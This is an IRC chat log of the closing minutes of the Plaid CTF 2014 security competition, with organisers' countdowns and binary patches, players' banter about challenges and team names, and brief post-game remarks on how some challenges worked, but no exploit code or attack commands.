20:23 #pctf: < geobot> hadn't been responsive
20:23 #pctf: < tomcr00se> i think i'm too tired for jackshit
20:23 #pctf: <+tylerni7> Sin__: awesie has a writeup about the site
20:23 #pctf: < Sin__> okay, cool
20:23 #pctf: <+tylerni7> it'll get posted after the ctf
20:24 #pctf: < tomcr00se> all looks like best quality code to me
20:24 #pctf: <+mserrano> tomcr00se: jackshit may be broken
20:24 #pctf: <+ricky> tomcr00se: I think 0xffa solved bronies 2 in about 2 hours or less - you can do it in 30 min, right?
20:24 #pctf: <+mserrano> we are checking
20:24 #pctf: < acez> thanks
20:24 #pctf: <+ricky> Solved meaning got super super cloes
20:24 #pctf: <+tylerni7> mserrano: it's /probably not/ broken
20:24 #pctf: <+tylerni7> but it might be
20:25 #pctf: < tomcr00se> mserrano: OMG THATS JACKSHIT
20:25 #pctf: <+ricky> Hahaha
20:25 #pctf: < tomcr00se> i work so hard
20:25 #pctf: < tomcr00se> think i deserve hint for _nightmare_
20:25 #pctf: <+ricky> Oh maybe more like 3 hours, not sure
20:25 #pctf: < ciliated> where the flag is in reekee
20:25 #pctf: <+ricky> Anyway :-)
20:25 #pctf: <+ricky> The flag is reekee is in a file somewhere I believe
20:25 #pctf: < tokki> tomcr00se:  they're gonna give the hint 30 seconds before the ctf ends
20:26 #pctf: < oceanx> tomcr00se: everyone deserves a hint for _nightmare_ :P
20:26 #pctf: < geobot> skier_ did you get a hint for _nightmare_
20:26 #pctf: < vladum_> quick question about reekee, please?
20:26 #pctf: <+ricky> vladum_: pm tylerni7
20:26 #pctf: < ciliated> +ricky: at which directory?
20:27 #pctf: <+ricky> ciliated: Not sure what directory, you don't need to know to solve it
20:27 -!- erketu [~erketu@5.45.180.209] has joined #pctf
20:27 #pctf: < sdjakl> geobot: ffa hasn't gotten any hints
20:27 #pctf: < geobot> he kinda surprised it hasn't really appreciate your sentiment
20:27 #pctf:  * tokki looks at clock looks at clock looks at clock throws clock
20:28 #pctf: < poppopret> is web150 considered easy or hard?
20:28 #pctf: < geobot> what 8 ctfs offer the most realistic data fetch and not a brony, fwiw, i think some of you sobs do you ball so hard?
20:28 -!- phiber__ [~bleh@79.146.84.198] has joined #pctf
20:29 #pctf: < comex> geobot: i'm a brony
20:29 #pctf: <+tylerni7> geobot: did you like the site?
20:29 #pctf: <+tylerni7> er
20:29 #pctf: <+tylerni7> comex: *
20:29 #pctf: <+ricky> Did you know all the captchas from memor?
20:29 #pctf: < comex> tylerni7: i was asleep for the actual brony part though :(
20:29 #pctf: <+tylerni7> aww
20:29 #pctf: <+tylerni7> that makes me sad
20:30 #pctf:  * ricky whistles
20:30 -!- mode/#pctf [+o mserrano] by ChanServ
20:30 #pctf: < comex> i like the fading colors though
20:30 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 30 minutes left | $40 added to each cash prizes so far (from CHANCE card)
20:30 -!- mode/#pctf [-o mserrano] by mserrano
20:30 #pctf: <+tylerni7> comex: yeah, top notch web skillz
20:30 #pctf: < geobot> all 8 users around but nothing that i put into how teams are your skillz at cracking sql dump seem to work with: ctf though -_-
20:30 #pctf: < ryan-c> yay, got parlor
20:31 #pctf: < sdjakl> tylerni7: I swear, the things you made me go through for reekee
20:31 #pctf: < clockish> jackshit updated to remove the stack protector
20:31 #pctf: < sdjakl> tylerni7: (speaking of web skills)
20:31 #pctf: <+dickoff> ANNOUNCE: ---------------- jackshit updated to remove the stack protector --------------------------------
20:31 #pctf: < Beched> huh
20:32 #pctf: < Beched> btw rather nice ctf, i thought it will be worse
20:32 #pctf: < iZsh> meh
20:32 #pctf: < Beched> i mean ppp never makes bad tasks
20:32 #pctf: < zoku> ricky: could you installs trace on the nightmare box?
20:32 #pctf: < ius> ricky: reporting in for knowing some PONIES by heart by now
20:32 #pctf: <+tylerni7> sdjakl: :)
20:32 #pctf: <+tylerni7> Beched: haha
20:32 #pctf: < Beched> but they make only PWN
20:32 #pctf: < iZsh> why do you guys change the binary 30min before the end?
20:32 #pctf: < Beched> and now there're various categories
20:32 #pctf: <+tylerni7> iZsh: because we fucked it up
20:32 #pctf: < zoku> ricky: trying to debug my ezhp exploit
20:32 #pctf: <+ricky> Congrats 0xfaa for solving Bronies 2!
20:32 #pctf: < Beched> but lol even in web there's pwn xD
20:32 #pctf: < geobot> we should make only pwn a setuid binary so ida
20:32 #pctf: <+cai_> Grats :)
20:32 #pctf: <+ricky> Nicely done!
20:32 #pctf: < iZsh> yeah but we worked with that :s
20:32 #pctf: < _blasty_> b0w d0wn
20:32 #pctf: < _blasty_> BOW DOWN
20:32 #pctf: <+mserrano> 0xffa: gg :D
20:32 #pctf: <+ricky> Good game
20:32 #pctf: <+tylerni7> :O
20:32 -!- yyyyyyy [~yyyyyyy@91.229.244.121] has joined #pctf
20:32 #pctf: < tokki> I L PolygonShifter
20:32 #pctf: <+mserrano> (for that problem anyway)
20:32 #pctf: < tokki> <3
20:32 #pctf: <+ricky> Sorry for that horrible C++
20:33 #pctf: <+tylerni7> dragon sector! better finish up bronies!
20:33 #pctf: <+tylerni7> :O
20:33 #pctf: < hellman_> gg
20:33 #pctf: < iZsh> meh, i was working on jackshit :s
20:33 #pctf: < wtbw> chronosphere due to discharge after the game is over
20:33 #pctf: <+tylerni7> iZsh: it's basically the same
20:33 -!- bs` [~bs@gateway/tor-sasl/bs/x-48276796] has left #pctf ["WeeChat 0.4.1"]
20:33 #pctf: <+mserrano> iZsh: the problem is the same, just no stack protector
20:33 #pctf: < Beched> иец
20:33 #pctf: < Beched> btw
20:33 #pctf: < ryan-c> who the hell is 0xffa?
20:33 #pctf: < Beched> who are 0xffa ? O_O
20:33 #pctf: < Beched> lol
20:33 #pctf: < tokki> ㅣㅐㅣ
20:34 #pctf: < tokki> lol
20:34 #pctf: < ryan-c> lol
20:34 #pctf: <+tylerni7> heh
20:34 #pctf: < zoku> ricky: any other suggestions?
20:34 #pctf: < ius> do the maths
20:34 #pctf: < ius> it'll check out
20:34 #pctf: <+frozencemetery> have you ever really looked at your hands?
20:34 #pctf: < zoku> ricky: I'm having a hell of a time debugging over a connectback shell with no tools
20:34 #pctf: < ryan-c> tylerni7: parlor was fun, thanks :D
20:34 #pctf: <+tylerni7> :P
20:34 #pctf: <+tylerni7> ryan-c: glad you enjoyed it :)
20:34 #pctf: <+tylerni7> ius: but.. addition is hard
20:34 #pctf: <+tylerni7> much like multiplication
20:34 #pctf: < foundation> no eindbazen this year? i guess they must have forgotten their password ?
20:34 #pctf: < tokki> lol
20:34 #pctf: <+mserrano> no way
20:35 #pctf: < sdjakl> 0xffa = x+y for x,y (in) Z
20:35 #pctf: < Beched> heh
20:35 #pctf: <+mserrano> we email it to them in plaintext
20:35 #pctf: < tokki> lol
20:35 #pctf: < Beched> yeah btw, Eindbazen have gone
20:35 #pctf: < Beched> hm
20:35 -!- cmplxen [~cmplxen@unaffiliated/cmplxen] has joined #pctf
20:35 #pctf: < ius> x + y = 0xffa, solve for x,y indeed ;)
20:36 -!- random_user_23 [5d6846fd@gateway/web/freenode/ip.93.104.70.253] has joined #pctf
20:36 #pctf: <+ricky> zoku: I think clockish is installing it now
20:36 #pctf: < ryan-c> tylerni7: is the ctf ending on time, or being extended an hour or two?
20:36 #pctf: < clockish> yeah, I'll do it
20:36 #pctf: <+tylerni7> ryan-c: ending on time
20:36 #pctf: <+dickoff> ryan-c: it is ending in 25 minutes
20:36 #pctf: <+tylerni7> as we have been saying :P
20:36 #pctf: <+tylerni7> it's a 48 hour competition
20:36 #pctf: <+tylerni7> you've all had plenty of time :)
20:36 #pctf: < clockish> zoku: anything else you want?
20:36 #pctf: < wtbw> frozencemetery: woah, I have *fingers*
20:36 #pctf: < Beched> ius
20:36 #pctf: < Beched> i remember you're from eindbazen, aren't you?
20:36 #pctf: < Beched> 0xffa == Eindbazen ??? O__O
20:37 #pctf: <+tylerni7> + ...
20:37 #pctf: <+mserrano>  O__O
20:37 #pctf: < tokki> O__O
20:37 #pctf: <+tylerni7> 0xffa > 0xeb
20:37 #pctf: < mathiasbynens> mind = blown
20:37 #pctf: < sdjakl> yeah tylerni7 seems to have gotten it
20:37 #pctf: <+frozencemetery> wtbw: weeeeeiiiiiiirdddd
20:37 #pctf: < dkohlbre> | (•□•) |
20:37 #pctf: < zoku> nah clockish, gdb is already installed but I can't use it over connectback anyways >_<
20:37 #pctf: < zoku> lol
20:37 #pctf: < ius> tylerni7: close ;)
20:37 #pctf: < tokki> lol
20:37 #pctf: <+tylerni7> ius: I know, I don't wanna give it away though :P
20:37 #pctf: < ius> :D
20:38 #pctf: < sven> it's not that hard anymore now :P
20:38 #pctf: <+ricky> zoku: Sorry, I was mistaken, apparently the machine is different from ezhp so things might be different
20:38 #pctf: < Gynvael> wtf chacning the jackshit binary --;
20:38 #pctf: <+mserrano> Gynvael: it's the same, but no stack protector =\
20:38 #pctf: <+ricky> Not sure what to suggest other than getting a similar env setup or staring more to figure out why your addresses aren't matching up
20:38 #pctf: < _blasty_> holy fuck my heart is pounding through my chest
20:38 #pctf: < Gynvael> comeone, we had the exploit almost working
20:38 #pctf: <+ricky> Hehe yeah, that was tight timing
20:38 #pctf: <+ricky> Gynvael: You still have time!
20:38 #pctf: < Gynvael> and now the layout of stack changed ;/
20:38 #pctf: <+ricky> Oh jackshit, never mind
20:39 #pctf: < zoku> yea, I've tried on debian and ubuntu ricky ;/
20:39 #pctf: <+mserrano> Gynvael: pm clockish
20:39 #pctf: <+ricky> Ah, sorry  - we're starting a copy of the old one up I think
20:39 #pctf: < clockish> Gynvael: sorry! I'll get the old one back up
20:39 #pctf: <+tylerni7> new one should be strictly easier, but...
20:39 -!- handlr [~handlr@unaffiliated/handlr] has left #pctf []
20:40 -!- mode/#pctf [+o mserrano] by ChanServ
20:40 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 20 minutes left | $40 added to each cash prizes so far (from CHANCE card)
20:40 -!- mode/#pctf [-o mserrano] by mserrano
20:40 #pctf: < nopple> lol i was also right at the point where it might have hurt more than helped on it, but i started going forward with new version already...
20:40 #pctf: < geobot> just hurt firefox os's feelings on default ubuntu think yeah crowell you're going to be nice to be awesome
20:40 #pctf: < Beched> geobot != tomcr00se ?
20:40 #pctf: <+tylerni7> lol
20:41 #pctf: < tokki> lol
20:41 #pctf: < ryan-c> lol
20:41 -!- hellman [~hellman@5.18.98.93] has joined #pctf
20:41 #pctf: < ryan-c> hellman: WHAT DID YOU DO
20:42 #pctf: < tokki> lol
20:42 -!- shabgard [~mostafa@unaffiliated/shabgard] has joined #pctf
20:42 #pctf: < iZsh> you guys still haven't figured out what 0xffa is? ;-)
20:42 #pctf: < ciliated> reekee is not directory traversal?
20:42 #pctf: <+houqp_> Beched: you need to ask geobot
20:42 #pctf: < sven> it's really not hard :P
20:42 #pctf: <+tylerni7> ciliated: you can pm me
20:42 #pctf: < _blasty_> Who will solve the 0xFFA puzzle first ?
20:43 #pctf: < iZsh> yeah 0xffa is a CTF chall :)
20:43 #pctf: < _blasty_> :-)
20:43 #pctf: < arthurdent> it's a xor of two teams
20:43 #pctf: < sven> nope
20:43 #pctf: <+mserrano> some of us have already "solved"
20:43 #pctf: <+mserrano> :P
20:43 #pctf: < _blasty_> warm.
20:43 #pctf: < sven> close though.
20:43 -!- paul_axe [~killobyte@h140.net36.bmstu.ru] has joined #pctf
20:43 #pctf: < paul_axe> hi, who can i ask about kpop?
20:43 #pctf: < AnthraX101> XOR? Like those who were in both before were not allowed in?
20:43 #pctf: < geobot> it did do it in?
20:43 #pctf: <+tylerni7> paul_axe: mserrano
20:43 #pctf: <+mserrano> paul_axe: me
20:43 #pctf: < sven> [22:34:59]  <sdjakl>        0xffa = x+y for x,y (in) Z
20:43 #pctf: < sven> now find x and y!
20:43 #pctf: < Beched> paul_axe: O_O ты за кого?)
20:44 #pctf: < sdjakl> if its clearer I can use latex notation
20:44 #pctf: < _blasty_> :-)
20:44 #pctf: < paul_axe> Beched: solo ;)
20:44 #pctf: < Beched> =)
20:44 #pctf: < sven> another hint: sdjakl is part of 0xffa
20:44 #pctf: <+tylerni7> Beched: english plz
20:44 #pctf: < plaintext> it's gg for us I guess
20:44 #pctf: <+dickoff> but I hear addition is hard, how will I ever solve for x and y?
20:44 #pctf: < zoku> clockish: is nightmare NATed?
20:44 #pctf: < iZsh> dickoff: :)
20:45 -!- DuM [~bt@50-88-124-149.res.bhn.net] has joined #pctf
20:45 #pctf: <+mserrano> <= 15 minutes
20:45 #pctf: < inter> zoku: no its under alcatraz
20:45 #pctf: < zoku> fuck
20:45 -!- gijs [~gijs@static.151.18.9.176.clients.your-server.de] has joined #pctf
20:45 #pctf: < poppopret> do ppl score points often in the last couple of minutes?
20:45 -!- khloe_k [~rg@cpe-172-251-69-130.socal.res.rr.com] has joined #pctf
20:46 #pctf: < iZsh> poppopret: when you're #1, murphy says yes
20:46 #pctf: < iZsh> when you're #2, murphy says no
20:46 #pctf: < plaintext> multiplication hint plox :P
20:46 #pctf: < sven> yeah, 1 second before the end ofc
20:46 #pctf: <+tylerni7> iZsh: or still says yes, and you move down to 3rd :(
20:46 #pctf: < zoku> what system is ezhp running on??
20:46 #pctf: < zoku> 32bit debian??
20:46 #pctf: < iZsh> tylerni7: heh yeah, i didn't think of this way ;-)
20:46 #pctf: < poppopret> OS X
20:47 #pctf: < hellman> Thx ppp for cool ctf (and teams), i think i'm off now :) gg
20:47 #pctf: <+mserrano> :) see ya hellman
20:47 #pctf: <+tylerni7> hellman: o/
20:47 #pctf: < corpille> any lasts minute hint on mtpox ?
20:47 #pctf: <+dickoff> hellman: o/
20:47 #pctf: < clockish> Gynvael: it's up at 1283
20:47 #pctf: < clockish> Gynvael: the port patch is the only difference
20:47 #pctf: < Adran> any chance web100 might be usable until the end? :(
20:47 #pctf: < Gynvael> thx
20:47 #pctf: < tokki> k lets chat i think i'm ready for the write ups
20:47 #pctf: < zoku> clockish: do you admin the ezhp box too??
20:47 #pctf: < clockish> Gynvael: super sorry
20:47 #pctf: < clockish> zoku: no
20:48 #pctf: < tokki> we're still stuck on crypto 20 ;)
20:48 #pctf: < geobot> and 20 minuteds
20:48 #pctf: <+ricky> 12 minutes left!
20:48 #pctf: < rray> geobot: hi
20:48 #pctf: < _blasty_> np: Jace Hall - LOL MONEY
20:49 #pctf: < sven> :>
20:49 -!- Hertle [~Hertle@host74-2.natpool.mwn.de] has joined #pctf
20:49 #pctf: < Adran> ricky: poor web100, everyone seems to be just hammering it right now
20:49 #pctf: < geobot> for web100, we can some other people
20:49 #pctf: < sdjakl> sven: so do we tell em at timeout; or just wait for the writeups ;)
20:49 #pctf: < sven> sdjakl: timeout sounds good :)
20:49 #pctf:  * ricky is rooting for DS to solve jackshit
20:49 #pctf: < sven> it's seriously obvious now
20:50 -!- eZpl0it [~ezpl0it@193.234.224.171] has joined #pctf
20:50 -!- antoniob [~antoniob@128.111.48.6] has joined #pctf
20:50 -!- mode/#pctf [+o mserrano] by ChanServ
20:50 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 10 minutes left | $40 added to each cash prizes so far (from CHANCE card)
20:50 #pctf: < iZsh> ricky: we're still trying to solve 2 others :)
20:50 #pctf: < iZsh> might get one in time
20:50 #pctf: < iZsh> :)
20:51 -!- javex [javex@2a01:7e00::f03c:91ff:fe70:76f8] has joined #pctf
20:52 #pctf: <+ricky> :-)
20:52 #pctf: < Guest68736> who can i ask for  web100 ?
20:52 #pctf: < geobot> then does have to get in the video on web100 is so difficult
20:52 -!- hellman [~hellman@5.18.98.93] has joined #pctf
20:52 #pctf: <@mserrano> 8
20:52 #pctf: < Hero2Morow> what's the highest number of points possible?
20:52 #pctf: <+ricky> 7.73
20:52 #pctf: < mischa__> there is a web100?
20:52 #pctf: < geobot> web100?
20:52 #pctf: < dkohlbre> man this machine's clock is off by 3.5 minutes wtf
20:52 #pctf: < tokki> lol
20:52 #pctf: < Guest68736> yeah web100
20:52 #pctf: < poppopret> what time is it on the server's clock
20:53 #pctf: < Guest68736> who can i ask for it ?
20:53 #pctf: < Adran> there is a web100 when it decides to load
20:53 #pctf: <@mserrano> 7
20:53 #pctf: < poppopret> 7?
20:53 #pctf: < Guest68736> mserrano: can i ask you smt for web100? in private
20:53 #pctf: < geobot> i feel bad for web100?
20:54 #pctf: <@mserrano> 6
20:54 #pctf: < poppopret> more minutes?
20:54 #pctf: <@mserrano> yes
20:54 -!- ronbarrey [~ronbarrey@c-75-72-113-52.hsd1.mn.comcast.net] has joined #pctf
20:54 #pctf: < |x_x|> By the technological gods.
20:54 #pctf: < |x_x|> I nodded off.
20:54 #pctf: < |x_x|> >_<
20:54 #pctf: < LuckyY> but but chronosphere discharges in 8 minutes
20:54 #pctf: < Guest68736> someone i can pm for web100?
20:54 #pctf: < |x_x|> Dropped six places. Y_Y
20:54 #pctf: < tokki> lol the chronosphere
20:54 #pctf: < tokki> dat chronosphere
20:55 #pctf: <@mserrano> 5
20:55 #pctf: < |x_x|> Quick, everyone send me your keys. >_>
20:55 #pctf: < inter> trading keys
20:55 #pctf: < inter> dota2 keys for tf2 keys
20:55 #pctf: < geobot> so, tf2 is linked to sit on the edge of
20:55 #pctf: < inter> 1:1 ratio
20:55 #pctf: < yyyyyyy> |x_x|: http://www.dabeagle.com/images/old-golden-key.jpg
20:55 #pctf: < geobot> |x_x|: correct
20:55 #pctf: < Ymgve> blah, I could have done moscow if I had one more hour
20:55 #pctf: < poppopret> everyone refresh the hints page
20:55 #pctf: < phiber__> how much left?
20:55 #pctf: < inter> add my steam: pctfpls
20:55 #pctf: < Guest68736> someone i can pm for web100?
20:56 #pctf: < |x_x|> I've got a sanity check key up for swap. pst.
20:56 #pctf: < geobot> just read the story, basically they don't reuse keys from when we solved sanity check
20:56 #pctf: <@mserrano> 4min
20:56 #pctf: < poppopret> lol guest68736
20:56 #pctf: < Guest68736> i have the awnser i need something else
20:56 #pctf: < inter> clockish: im waiting on your writeup
20:56 #pctf: < tokki> 4min 240seconds!
20:56 #pctf: < iago-x86> Well, I guess that's it
20:56 -!- Sin__ [~R@78.96.111.132] has joined #pctf
20:56 #pctf: < iago-x86> I'm not solving anything by then :)
20:56 #pctf: < inter> 4 minute 20 seconds
20:56 #pctf: < tsuro> iago-x86: same here :)
20:56 #pctf: < iago-x86> Damn you, blackjack!
20:56 #pctf: < iago-x86> tsuro: How'd you do?
20:56 #pctf: < inter> 420 blaze it
20:57 #pctf: <@mserrano> 3min
20:57 #pctf: < Ymgve> hope no one solves moscow
20:57 #pctf: < tokki> damn
20:57 #pctf: < tsuro> iago-x86: we're still 4th, crossing my fingers :)
20:57 #pctf: <@mserrano> Ymgve: I don't think anyone will :(
20:57 #pctf: < clockish> inter: heh, I'll just pm you the short version, other ppl can post real writeups :P
20:57 #pctf: < iago-x86> nice :)
20:57 #pctf: < tokki> tsuro: ftw!
20:57 #pctf: < wtbw> moscow got released a bit late it seems
20:57 #pctf: < _blasty_> j00 kn0w h4ck3rz lyk3 2 s3ll drugZ?
20:57 #pctf: < wtbw> downside of the board system
20:57 #pctf: < sven> we'd need another hour for moscow :/
20:57 #pctf: < iago-x86> tsuro: we're 36th, but with only 3 people who solved anything :)
20:58 #pctf: <+ricky> That's pretty impressive
20:58 #pctf: <@mserrano> 2 mi
20:58 #pctf: <@mserrano> n
20:58 #pctf: < wtbw> sven: if it was windows I might've managed it
20:58 #pctf: < wtbw> got a few more tools there :)
20:58 #pctf: < yyyyyyy> mserrano, what's a mi?
20:58 #pctf: < tomcr00se> i mean, 13th is better than 12th
20:58 #pctf: < wtbw> minute
20:58 #pctf: <@mserrano> yyyyyyy: meant minute, hit enter too early
20:58 #pctf: < asmoday> PENCILS DOWN GAME OVER
20:58 #pctf: < wtbw> tomcr00se: pft!
20:58 #pctf: < tokki> mserrano:  lol
20:58 #pctf: < clockish> asmoday NOT YET
20:58 #pctf: < tsuro> iago-x86: yeah, we were far more than that
20:58 #pctf: <+ricky> Please pass your exam booklets to the front
20:58 #pctf: <+tylerni7> ricky: heh
20:58 #pctf: < chrissing> hahaha
20:59 #pctf: <@mserrano> 1 minute
20:59 #pctf: < iago-x86> I personally solved 7 challenges
20:59 #pctf: < tomcr00se> let me just submit my cheating stored keys brb one sec
20:59 #pctf: < geobot> brb - registering for the transposition cipher was hacktastic
20:59 #pctf: <+ricky> Who will submit the last key?
20:59 #pctf: < tsuro> iago-x86: we even have 3 students who get credits at our university if they play CTF competitions
20:59 #pctf: < iago-x86> Nice! :)
20:59 #pctf: <+tylerni7> tomcr00se: :P
20:59 #pctf: < iZsh> dammit ENOTIME
20:59 #pctf: <+cai_> almost over
20:59 #pctf: <+cai_> in few seconds
20:59 #pctf: < inter> tomcr00se: ill give you a cookie with raisins in it
20:59 #pctf: < sven> time for murphy now
20:59 #pctf: <@mserrano> o.o
20:59 #pctf: <+ricky> 10
20:59 #pctf: < _blasty_> 9
20:59 #pctf: < zoku> nnooooo
20:59 #pctf: < Ymgve> give tips for all tasks now pls
20:59 #pctf: <+ricky> 5
20:59 #pctf: < |x_x|> 5
20:59 #pctf: < Adran> 4
20:59 #pctf: <+ricky> 2
20:59 #pctf: <+ricky> 1
21:00 #pctf: < Adran> 3
21:00 #pctf: < |x_x|> 1
21:00 #pctf: <+ricky> 0
21:00 #pctf: < poppopret> 4
21:00 #pctf: < yyyyyyy> -1e100
21:00 #pctf: < poppopret> 2
21:00 #pctf: < zoku> nooo wayyy
21:00 #pctf: < Reinhart> -1
21:00 #pctf: < poppopret> 5
21:00 #pctf: < Adran> -1
21:00 #pctf: < poppopret> 6
21:00 #pctf: < rray> 2 minutes left? guess i should start on bronies now
21:00 #pctf: < wtbw> omg_not_a_real_key
21:00 #pctf: < Reinhart> -2
21:00 #pctf: <+dickoff> GG!
21:00 #pctf: < |x_x|> ln(1023)
21:00 #pctf: <@mserrano> game over
21:00 #pctf: <+ricky> Good game!
21:00 #pctf: < _blasty_> >>> "%x" % (0xf0f+0xeb)
21:00 #pctf: < _blasty_> 'ffa'
21:00 #pctf: < sdjakl> woooo
21:00 #pctf: < tomcr00se> GG FOLKS
21:00 -!- sssssssss [5a9c5102@gateway/web/freenode/ip.90.156.81.2] has joined #pctf
21:00 #pctf: < Gynvael> GG
21:00 #pctf: <+cai_> GAME OVER
21:00 #pctf: < LuckyY> 502 Bad Gateway
21:00 #pctf: < chrissing> It was fun
21:00 #pctf: <+cai_> gg
21:00 #pctf: < LuckyY> :D
21:00 #pctf: < rray> gg
21:00 #pctf: < architekt> Good Game 8-)
21:00 #pctf: < poppopret> and 502 bad gateway!!
21:00 #pctf: < whois> good
21:00 #pctf: < iZsh> \o/
21:00 #pctf: < wtbw> thanks PPP :)
21:00 #pctf: < computerality> _blasty_: mind=blown
21:00 #pctf: < |x_x|> Now that it's all over. I'm going to spoil one of the challenges for you guys. Sanity Check's key was "poop"
21:00 #pctf: < geobot> didn't know that haven't solved sanity check key easily trackable by then :)
21:00 #pctf: < muchacho> wtf was the path in kpop?
21:00 #pctf: < x56> woop woop! gg and thanks :)
21:00 #pctf: < mischa__> nice ctf
21:00 #pctf: < iZsh> jeez
21:00 #pctf: < Adran> poppopret: yeah
21:00 -!- mode/#pctf [+o cai_] by ChanServ
21:00 #pctf: < tokki> gg :D
21:00 #pctf: < plaintext> GG
21:00 #pctf: < ius> Thanks!
21:00 #pctf: <+dickoff> thanks for playing everyone :)
21:00 #pctf: < plaintext> thanks for the ctf
21:00 #pctf: < plaintext> what was multiplication?
21:00 #pctf: < KT> ok guy, whats 38.55 * 1700?
21:00 #pctf: < inter> gg
21:00 #pctf: < Ymgve> great ctf!
21:00 #pctf: < iZsh> so yeah, 0xffa = f0f + e
21:00 #pctf: < khloe_k> thx PPP
21:00 #pctf: < x56> 100000
21:00 #pctf: < Otacon22> gg
21:00 #pctf: < tomcr00se> 100,000
21:00 #pctf: < iZsh> so yeah, 0xffa = f0f + eb
21:00 #pctf: < Gynvael> gg
21:00 #pctf: < corpille> 100000
21:00 #pctf: <@mserrano> 38.55 * 1700 was 100000
21:00 #pctf: < Ymgve> KT: 100000 or something, excel bug
21:00 #pctf: < plaintext> wat
21:00 -!- HockeyInJune [sid17970@gateway/web/irccloud.com/x-ctjiaaopkbcjhczm] has left #pctf []
21:00 #pctf: < plaintext> why
21:00 #pctf: < tokki> thanks for making such an awesome ctf
21:00 #pctf: < architekt> Nice Game PPP
21:00 #pctf: <@mserrano> because of an excel 2007 bug
21:00 #pctf: < warrick> GOOOD GAME, THANKS PPP
21:00 #pctf: < tomcr00se> what was _nightmares_
21:00 #pctf: < ltfish> thank you guys for this game!
21:00 #pctf: < tokki> NOW TIME FOR WRITE UPS
21:00 #pctf: < tokki> thanks PPP :D
21:01 #pctf: < tomcr00se> real python pwning with shellcode?
21:01 #pctf: < wtbw> graphs was my favourite
21:01 #pctf: < geobot> we used it on how the pwning
21:01 #pctf: < Gynvael> thanks PPP ;)
21:01 #pctf: < _blasty_> THE FINAL FAIL ALLIANCE WOULD LIKE TO THANK PPP
21:01 #pctf: < Gynvael> gz 0xffa
21:01 #pctf: < plaintext> wh yis it 100,000?
21:01 #pctf: < |x_x|> http://scienceblogs.com/goodmath/2007/10/02/the-excel-65535100000-bug/ Read up on the 38.55 * 1700
21:01 #pctf: < Pitr_> thanks PPP!
21:01 #pctf: < Guest26684> redesvouz cookie, what was the BEEF damnit
21:01 #pctf: < _blasty_> FOR DIZ GAME
21:01 #pctf: < iZsh> thx guys
21:01 #pctf: < Ymgve> what was trojaned in the gcc challenge?
21:01 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] GG; congrats 0xffa, Dragon Sector, MSLC | $40 added to each cash prizes so far (from CHANCE card)
21:01 #pctf: < bool_101> thanks PPP for a great game!
21:01 #pctf: <+tylerni7> Gynvael: you're welcome, nice job!
21:01 #pctf: < kris> GG
21:01 #pctf: < tokki> lol
21:01 #pctf: < comex> Ymgve: openssl
21:01 #pctf: <+awesie> http://lmgtfy.com/?q=65535+multiplication
21:01 #pctf: < moki> thanks for hosting this
21:01 #pctf: < plaintext> oh so it was trivia
21:01 -!- moki [~humpy@server1.rhave.dk] has left #pctf []
21:01 #pctf: < plaintext> nice
21:01 #pctf: <+houqp_> Guest26684: it's the beef
21:01 #pctf: < |x_x|> Multiplication is hard is an old Excel Sheet bug.
21:01 #pctf: < inter> thanks to mserrano, awesie, dickoff, frozencemetery, gbarboza, houqp_, ricky, tylerni7, and clockish for awsome challenges
21:01 #pctf: < dkohlbre> ok bbos, what was the password, I got into the emulator but it told me the key was the password :/
21:01 #pctf: < iago-x86> Gynvael: Hey, looking forward to our debrief at work :)
21:01 #pctf: < tokki> LeaveRet had an awesome time :D
21:01 #pctf: < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:01 #pctf: < geobot> did a writeup
21:01 -!- EdHunter [foobar@2-107-180-168-dynamic.dk.customer.tdc.net] has left #pctf []
21:01 -!- cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] IT'S OVER! | Survey: http://bit.ly/1ifQBOo | $40 added to each cash prizes so far (from CHANCE card)
21:01 #pctf: < ryan-c> so, did anyone solve rsa from scratch?
21:01 #pctf: < Adran> mserrano: thats terribe
21:01 #pctf: < clockish> tomcr00se: nightmares was writing to /proc/self/mem
21:01 #pctf: < poppopret> how'd you guys all do??
21:01 #pctf: < tokki> DAT MONIEZ
21:01 #pctf: < Gynvael> iago-x86: ;)
21:01 #pctf: <+dickoff> inter: you forgot cai_ !
21:01 #pctf: < abuss> (ignore the nuit du hack title, I don't know how2jekyll)
21:01 #pctf: <+frozencemetery> inter: :)
21:01 #pctf: < lavish> congrats ppp!
21:01 #pctf: < tomcr00se> clockish: omg duh :P...nice
21:01 #pctf: < lavish> classy chals as usual
21:01 #pctf: < Ymgve> comex: but openssl wasn't included, just gcc?
21:01 #pctf: < bool101> Grats 0xffa
21:02 #pctf: <+dickoff> I'm looking forward to people's writeups
21:02 #pctf: <@mserrano> tomcr00se: or use a code object!
21:02 #pctf: < ius> Thanks PPP!
21:02 #pctf: < Adran> Thanks for the ctf guys
21:02 #pctf: < robbje> GG, nice CTF, thank you for hosting
21:02 #pctf: <@cai_> congrats to the winners :)
21:02 #pctf: < ius> esp. bronies was insane
21:02 #pctf: < ius> :D
21:02 #pctf: <+dickoff> ius: congrats!
21:02 #pctf: < lavish> and grats to the winners
21:02 #pctf: <@cai_> GG all
21:02 #pctf: < comex> Ymgve: if you compile openssl with that gcc, it gets backdoored
21:02 #pctf: < _blasty_> BRONIES.
21:02 #pctf: < someone_> what was the wallet id for mtpox
21:02 #pctf: < jagger_> gg - really nic challenges - a lot of fun instead of going through 100 iterations of guessing
21:02 #pctf: < ius> so much xss/mem corr
21:02 -!- _bcc [~bcc@75-137-7-50.dhcp.nwnn.ga.charter.com] has left #pctf []
21:02 #pctf: < Guest71506> gg
21:02 #pctf: < iago-x86> I can't believe we didn't solve the tor level... we have two tor devs on our team! :)
21:02 #pctf: < Ymgve> comex: that's the theory but we could never find the backdoor
21:02 -!- DoctorDelusional [~stranger@ec2-204-236-195-41.compute-1.amazonaws.com] has left #pctf []
21:02 #pctf: <+awesie> dkohlbre: there was password to unlock the device, that password was the key
21:02 #pctf: < arthurdent> anyone want to make a googledox with all the writeups or something?
21:02 #pctf: < valis> wow, that was intensive - congrats 0xffa on bronies part 2
21:02 #pctf: < _blasty_> My captcha approach was suboptimal. I kept refreshing till I got 'Rarity'.
21:02 -!- Rexperience7 [~Rex@unaffiliated/rexperience7] has joined #pctf
21:02 #pctf: <+tylerni7> iago-x86: hahahaha
